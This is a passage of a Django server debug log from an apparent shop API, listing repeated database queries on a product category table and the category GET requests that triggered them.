"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:57,167 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:57,169 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:57,172 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:57,174 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:57,178 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:57,180 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:57,183 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:57,185 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:57,187 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:57,190 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:57,193 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:57,196 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:57,198 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:57,201 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:57,203 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:37:58,599 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:58,609 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:58,615 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:58,619 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:58,625 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:58,629 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:58,633 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:58,636 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:58,640 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:58,645 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:58,649 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:58,656 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:58,659 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:58,663 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:58,668 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:58,672 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:58,676 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:58,679 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:58,683 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:58,689 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:58,693 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:58,697 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:58,701 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:58,705 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:58,709 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:58,714 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:58,718 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:58,722 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:58,726 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:58,729 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:58,735 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:58,739 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:58,742 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:58,746 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:58,750 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:58,756 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:58,760 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:58,764 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:58,767 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:58,771 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:58,775 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:58,779 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:58,783 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:58,787 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:58,792 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:58,795 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:38:00,908 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:38:00,917 utils 4252 140031492613888 (0.009) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-20 02:38:00,923 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:38:00,928 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:00,929 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:38:00,934 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 02:38:00] "GET /api/v1/categories/15 HTTP/1.0" 200 